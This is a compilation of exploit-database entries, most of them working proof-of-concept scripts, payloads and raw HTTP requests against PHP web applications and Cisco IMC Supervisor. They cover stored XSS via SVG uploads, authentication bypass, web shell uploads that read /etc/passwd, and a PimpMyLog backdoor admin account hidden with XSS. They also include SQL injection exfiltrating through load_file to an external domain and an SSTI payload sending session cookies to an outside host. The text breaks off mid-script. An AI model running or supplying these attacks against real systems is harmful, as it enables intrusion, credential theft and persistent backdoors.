name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="News Portal."> <meta name="author" content="PHPGurukul"> <!-- App title --> <title>News Portal | Admin Panel</title> [...]

Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS Version: V10.4.1 Bugs: Multiple XSS Technology: PHP Vendor URL: https://www.projeqtor.org Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download Date of found: 09.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ### XSS-1 ### visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken= payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E ### XSS-2 ### steps: 1. login to account 2. go projects and create project 3.add attachment 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. Go to svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg ) ### XSS-3 ### Go to below adress (post request) POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1 Host: localhost Content-Length: 35 sec-ch-ua: Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/projeqtor/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3 Connection: close resultAck=<script>alert(4)</script>

[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass [+] Cisco IMC Supervisor - < 2.2.1.0 [+] Date: 08/21/2019 [+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo [+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html [+] Vulnerability Discovery : Pedro Ribeiro [+] Exploit Author: Fatih Sencer [+] CVE: CVE-2019-1937 ---------------------------------------------------- Usage: ./python3 CiscoIMC-Bypass.py -u host [+] Target https://xxxxxx.com [+] Target OK [+] Exploit Succes [+] Login name : admin [+] Cookie : REACTED """ import argparse,requests,warnings,base64,json,random,string from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) def init(): parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass') parser.add_argument('-u','--host',help='Host', type=str, required=True) args = parser.parse_args() exploit(args) def exploit(args): session = requests.Session() headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)", "X-Requested-With": "XMLHttpRequest", "Referer": "https://{}/".format(args.host), "X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)), "X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)) } target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host) print("[+] Target {}".format(args.host)) exp_send = session.get(target, headers=headers, verify=False, timeout=10) if exp_send.status_code == 200: print("[+] Target OK") body_data = json.loads(exp_send.text) if not (body_data.get('loginName') is None): print("[+] Exploit Succes") print("[+] Login name : {}".format(body_data.get('loginName'))) print("[+] Cookie : {}".format(session.cookies.get_dict())) else: print("[-] Exploit Failed") else: print("[-] N/A") exit() if __name__ == "__main__": init()

Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE) Application: Admidio Version: 4.2.10 Bugs: RCE Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 10.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to account 2. Go to Announcements 3. Add Entry 4. Upload .phar file in image upload section. .phar file Content <?php echo system('cat /etc/passwd');?> 5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar ) Request: POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1 Host: localhost Content-Length: 378 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB Connection: close ------WebKitFormBoundaryne9TRuC1tAqhR86r Content-Disposition: form-data; name="upload"; filename="shell.phar" Content-Type: application/octet-stream <?php echo system('cat /etc/passwd');?> ------WebKitFormBoundaryne9TRuC1tAqhR86r Content-Disposition: form-data; name="ckCsrfToken" o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB ------WebKitFormBoundaryne9TRuC1tAqhR86r--

# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2023-07-10 # Vendor Homepage: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter # Version: 1.2.2 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-37269 # Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3 # Video POC : https://youtu.be/Dqhq8rdrcqc Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality Description : WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script Payload:- // image.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> //Post Request POST /backend/system/settings/update/winter/backend/branding HTTP/1.1 Host: 172.17.0.2 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2 X-WINTER-REQUEST-HANDLER: formLogo::onUpload Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206 Content-Length: 608 Origin: http://172.17.0.2 Connection: close Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D -----------------------------186411693022341939203410401206 Content-Disposition: form-data; name="file_data"; filename="image.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------186411693022341939203410401206-- |-----------------------------------------EOF-----------------------------------------

#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE) #Application: pluck #Version: 4.7.18 #Bugs: RCE #Technology: PHP #Vendor URL: https://github.com/pluck-cms/pluck #Software Link: https://github.com/pluck-cms/pluck #Date of found: 10-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux import requests from requests_toolbelt.multipart.encoder import MultipartEncoder login_url = "http://localhost/pluck/login.php" upload_url = "http://localhost/pluck/admin.php?action=installmodule" headers = {"Referer": login_url,} login_payload = {"cont1": "admin","bogus": "","submit": "Log in"} file_path = input("ZIP file path: ") multipart_data = MultipartEncoder( fields={ "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"), "submit": "Upload" } ) session = requests.Session() login_response = session.post(login_url, headers=headers, data=login_payload) if login_response.status_code == 200: print("Login account") upload_headers = { "Referer": upload_url, "Content-Type": multipart_data.content_type } upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data) if upload_response.status_code == 200: print("ZIP file download.") else: print("ZIP file download error. Response code:", upload_response.status_code) else: print("Login problem. response code:", login_response.status_code) rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php" rce=requests.get(rce_url) print(rce.text)

# Exploit Title: PimpMyLog v1.7.14 - Improper access control # Date: 2023-07-10 # Exploit Author: thoughtfault # Vendor Homepage: https://www.pimpmylog.com/ # Software Link: https://github.com/potsky/PimpMyLog # Version: 1.5.2-1.7.14 # Tested on: Ubuntu 22.04 # CVE : N/A # Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys. import requests import argparse from base64 import b64encode js = """var table = document.getElementById("userlisttable"); var rows = table.getElementsByTagName("tr"); for (var i = 0; i < rows.length; i++) { var cells = rows[i].getElementsByTagName("td"); for (var j = 0; j < cells.length; j++) { var anchors = cells[j].getElementsByTagName("a"); for (var k = 0; k < anchors.length; k++) { if ( anchors[k].innerText === "{}" || anchors[k].innerText.includes("atob(") || anchors[k].querySelector("script") !== null ) { rows[i].parentNode.removeChild(rows[i]); } } } } var userCountElement = document.querySelector('.lead'); var userCountText = userCountElement.textContent; var userCount = parseInt(userCountText); if(!isNaN(userCount)){ userCount--; userCountElement.textContent = userCount + ' Users'; }""" payload = "<script>eval(atob('{}'));</script>" def backdoor(url, username, password): config_url = url + '/inc/configure.php' print("[*] Creating admin account...") r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password}) if r.status_code != 200: print("[!] An error occured") return print("[*] Hiding admin account...") base64_js = b64encode(js.format(username).encode()).decode() xss_payload = payload.format(base64_js) r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password}) if r.status_code != 200: print("[!] An error occured") return print("[*] Exploit finished!") parser = argparse.ArgumentParser() parser.add_argument('--url', help='The base url of the target', required=True) parser.add_argument('--username', default='backdoor', help='The username of the backdoor account') parser.add_argument('--password', default='backdoor', help='The password of the backdoor account') args = parser.parse_args() backdoor(args.url.rstrip('/'), args.username, args.password)

# Exploit Title: phpfm v1.7.9 - Authentication type juggling # Date: 2023-07-10 # Exploit Author: thoughtfault # Vendor Homepage: https://www.dulldusk.com/phpfm/ # Software Link: https://github.com/dulldusk/phpfm/ # Version: 1.6.1-1.7.9 # Tested on: Ubuntu 22.04 # CVE : N/A """ An authentication bypass exists in when the hash of the password selected by the user incidently begins with 0e, 00e, and in some PHP versions, 0x. This is because loose type comparision is performed between the password hash and the loggedon value, which by default for an unauthenticated user is 0 and can additionally be controlled by the attacker. This allows an attacker to bypass the login and obtain remote code execution. A list of vulnerable password hashes can be found here. https://github.com/spaze/hashes/blob/master/md5.md """ import requests import sys if len(sys.argv) < 2: print(f"[*] Syntax: ./{__file__} http://target/") sys.exit(0) url = sys.argv[1].rstrip('/') + "/index.php" payload_name = "shell.php" payload = '<?php echo "I am a shell"; ?>' payload_url = url.replace("index.php", payload_name) headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"} files = {"dir_dest": (None, "/srv/http/"), "action": (None, "10"), "upfiles[]": ("shell.php", payload) } requests.post(url, headers=headers, files=files) r = requests.get(payload_url) if r.status_code == 200: print(f"[*] Exploit sucessfull: {payload_url}") print(r.text) else: print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}" )

# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) # Google Dork: inurl:"index.php?option=com_booking" # Date: 07/12/2023 # Exploit Author: qw3rTyTy # Vendor Homepage: http://www.artio.net/ # Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download # Version: 2.4.9 # Tested on: Slackware/Nginx/Joomla! 3.10.11 # ## # File: site/booking.php # # <?php # [...] #18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php'); # [...] # # File: admin/booking.php # # <?php # [...] #104 if (class_exists(($classname = AImporter::controller()))) { #105 $controller = new $classname(); #106 /* @var $controller JController */ #107 $controller->execute(JRequest::getVar('task')); #108 $controller->redirect(); #109 } # [...] # # File: admin/controllers/customer.php # # <?php # [...] #240 function getUserData() { #241 $user = JFactory::getUser(JRequest::getInt('id')); #242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email); #243 die(json_encode($data)); #244 } # [...] # # A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'. # # curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123 # # So, an attacker can easily enumerate all accounts by bruteforcing. # ## import argparse import urllib.parse import requests from sys import exit from time import sleep def enumerateAccounts(options): i = 1 url = options.url url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id=" while True: try: response = requests.get("{}{}".format(url, str(i))) if response.status_code == 200: try: jsondocument = response.json() if jsondocument["name"] != None: print(jsondocument) except requests.exceptions.JSONDecodeError: raise else: break except Exception as ex: print(ex) break i += 1 def main(): p = argparse.ArgumentParser() p.add_argument("-u", "--url", type=str, required=True) parsed = p.parse_args() try: t = urllib.parse.urlparse(parsed.url) except ValueError as ex: print(ex) exit() if not t[0].startswith("http") and not t[0].startswith("https"): print("Improper URL given.") exit() if len(t[1]) == 0: print("Improper URL given.") exit() enumerateAccounts(parsed) if __name__ == "__main__": main()

## Title: Vaidya-Mitra 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 07.12.2023 ## Vendor: https://mayurik.com/ ## Software: free: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `useremail` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+' was submitted in the useremail parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker easily can steal all information from this system, like login credentials, phone numbers and etc. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: useremail (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' RLIKE (SELECT (CASE WHEN (5532=5532) THEN 0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gHln'='gHln&userpassword=rootadmin Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: [email protected]'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND 'ZWBa'='ZWBa&userpassword=rootadmin --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html) ## Time spend: 00:27:00

#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) #Application: Backdrop Cms #Version: v1.25.1 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://backdropcms.org/ #Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== 1. login to account 2. go to http://localhost/backdrop/?q=admin/config/system/site-information 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/backdrop/files/malas_2.svg) Request POST /backdrop/?q=admin/config/system/site-information HTTP/1.1 Host: localhost Content-Length: 2116 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/backdrop/?q=admin/config/system/site-information Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E Connection: close ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_name" My Backdrop Site ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_slogan" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_mail" [email protected] ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_logo_path" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_favicon_upload]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_favicon_path" core/misc/favicon.ico ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_frontpage" home ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_403" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_404" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_build_id" form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_token" siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40 ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_id" system_site_information_settings ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="op" Save configuration ------WebKitForm

#!/bin/bash # Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability # Date: July 12 2023 # Exploit Author: 1337kid # Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html # Version: 1.0 # Tested on: Ubuntu # CVE : CVE-2023-37629 # # chmod +x exploit.sh # ./exploit.sh web_url # ./exploit.sh http://127.0.0.1:8080/ echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ " echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\" echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /" echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ " echo " @1337kid" echo if [[ $1 == '' ]]; then echo "No URL specified!" exit fi base_url=$1 unauth_file_upload() { # CVE-2023-37629 - File upload vuln echo "Generating shell.php" #=========== cat > shell.php << EOF <?php system(\$_GET['cmd']); ?> EOF #=========== echo "done" curl -s -F [email protected] -F submit=pwned $base_url/add-pig.php > /dev/null req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}') if [[ $req == "200" ]]; then echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php" else echo "Failed to upload a shell" fi } req=$(curl -I -s $base_url | head -1 | awk '{print $2}') if [[ $req -eq "200" ]]; then unauth_file_upload else echo "Error" echo "Status Code: $req" fi

#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: SSTI #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 13-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to test user account 2. Go to Content Manager 3. Add New Content 4. set as ''' {$smarty.version} {{7*7}} {$smarty.now} {$smarty.template} <img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}> <img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}> <img src=YOU_SERVER/{$smarty.cookies.__c}> ''' to conten_en section. 5.If any user visit to page, Hacker hijack all cookie payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E POC Request POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 988 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd Connection: close mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1 Poc Video: https://youtu.be/zq3u3jRpfqM

#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: Remote Code Execution(RCE) #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux import requests login_url = 'http://localhost/admin/login.php' username=input('username = ') password=input('password = ') upload_url = 'http://localhost/admin/moduleinterface.php' file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ") #phar file content """"<?php echo system('cat /etc/passwd') ?>""""" login_data = { 'username': username, 'password': password, 'loginsubmit': 'Submit' } session = requests.Session() response = session.post(login_url, data=login_data) if response.status_code == 200: print('Login account') else: print('Login promlem.') exit() files 